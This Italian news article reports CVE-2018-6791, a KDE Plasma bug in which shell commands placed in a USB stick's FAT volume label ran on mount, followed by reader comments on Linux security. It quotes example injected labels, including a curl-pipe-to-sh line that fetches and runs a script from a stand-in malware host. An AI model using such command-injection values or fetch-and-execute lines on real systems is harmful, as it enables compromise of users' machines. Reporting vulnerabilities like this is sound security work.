Quando il nome di una chiavetta è fonte di exploit: scivolone di KDE Plasma

Quando il nome di una chiavetta è fonte di exploit: scivolone di KDE Plasma

KDE Plasma soffriva, almeno fino a pochi giorni fa, di un curioso (e pericoloso) bug che permetteva l'esecuzione di comandi arbitrari semplicemente inserendoli nell'etichetta di chiavette USB

di pubblicata il , alle 10:01 nel canale Sicurezza
Linux
 

KDE Plasma, uno tra i primi ambienti desktop sviluppati per Linux, soffriva di una grave vulnerabilità ora corretta: nelle versioni precedenti alla 5.12, rilasciata pochi giorni fa, era possibile eseguire comandi arbitrari semplicemente inserendoli nell'etichetta di un dispositivo di archiviazione portatile come una chiavetta USB.

La vulnerabilità permetteva a un attaccante di eseguire comandi semplicemente inserendoli nell'etichetta di un volume FAT (FAT, FAT32, VFAT). Affinché questo fosse possibile, era necessario inserire i comandi tra i caratteri `` o $() - ad esempio `reboot` (nel caso più innocuo) o $(curl http://scaricaunmalware.com/file.sh | sh) (che scarica un file e lo esegue) - e KDE Plasma avrebbe provveduto a eseguire tale codice al collegamento del dispositivo. Ovviamente la fantasia vola in questi casi ed è facile immaginare danni anche gravi, ad esempio con comandi che possono cancellare il contenuto della cartella home o scaricare eseguibili malevoli.

La vulnerabilità, nota come CVE-2018-6791, è stata corretta con il rilascio di KDE Plasma 5.12 e, come scrive Phoronix, il team sta lavorando alla correzione anche nelle versioni precedenti ancora in uso in alcune distribuzioni.

Ovviamente è necessario avere accesso fisico alla macchina che si vuole attaccare e questo limita le possibilità di attacco, ma questo rimane un problema non da poco che il progetto KDE si è lasciato sfuggire. La vulnerabilità è stata resa nota solo dopo la diffusione dell'aggiornamento alla nuova versione dell'ambiente senza il problema.

Resta aggiornato sulle ultime offerte

Ricevi comodamente via email le segnalazioni della redazione di Hardware Upgrade sui prodotti tecnologici in offerta più interessanti per te

Quando invii il modulo, controlla la tua inbox per confermare l'iscrizione.
Leggi la Privacy Policy per maggiori informazioni sulla gestione dei dati personali

5 Commenti
Gli autori dei commenti, e non la redazione, sono responsabili dei contenuti da loro inseriti - info
zappy13 Febbraio 2018, 11:16 #1
ma non era già uscito qualche tempo fa qualche problema serio relativo ai nomi delle unità USB?
a livello più basso del d.e., se non ricordo male...
canislupus13 Febbraio 2018, 11:20 #2
Beh direi un bug non di poco conto.
Sarebbe giusto dargli la giusta rilevanza in quanto per correttezza serve per sfatare il falso mito che un sistema operativo sia sempre sicuro per definizione.
(per la cronaca uso Linux, Windows e MacOs).
floc13 Febbraio 2018, 11:55 #3
vero, ma il linux "sicuro per definizione" certamente non ha su kde plasma che è un DE
zappy13 Febbraio 2018, 12:06 #4
Originariamente inviato da: floc
vero, ma il linux "sicuro per definizione" certamente non ha su kde plasma che è un DE


beh, cmq
https://nakedsecurity.sophos.com/20...ulnerabilities/
https://www.macitynet.it/creato-bad...ispositivo-usb/
(son 2 cose diverse)
floc13 Febbraio 2018, 19:46 #5
appunto, sono 2 cose diverse.
Badusb agisce a livello ancora più basso e quindi non c'entra nessun SO, le "79 vulnerabilità" vogliono dire molto poco, dicono che linux non è sicuro in maniera assoluta ma non certo che lo sia meno di altri SO.

La sicurezza di linux non è un "falso mito", semplicemente non è un assoluto, gli assoluti nel campo della sicurezza informatica hanno vita molto breve.

Devi effettuare il login per poter commentare
Se non sei ancora registrato, puoi farlo attraverso questo form.
Se sei già registrato e loggato nel sito, puoi inserire il tuo commento.
Si tenga presente quanto letto nel regolamento, nel rispetto del "quieto vivere".

La discussione è consultabile anche qui, sul forum.
 
^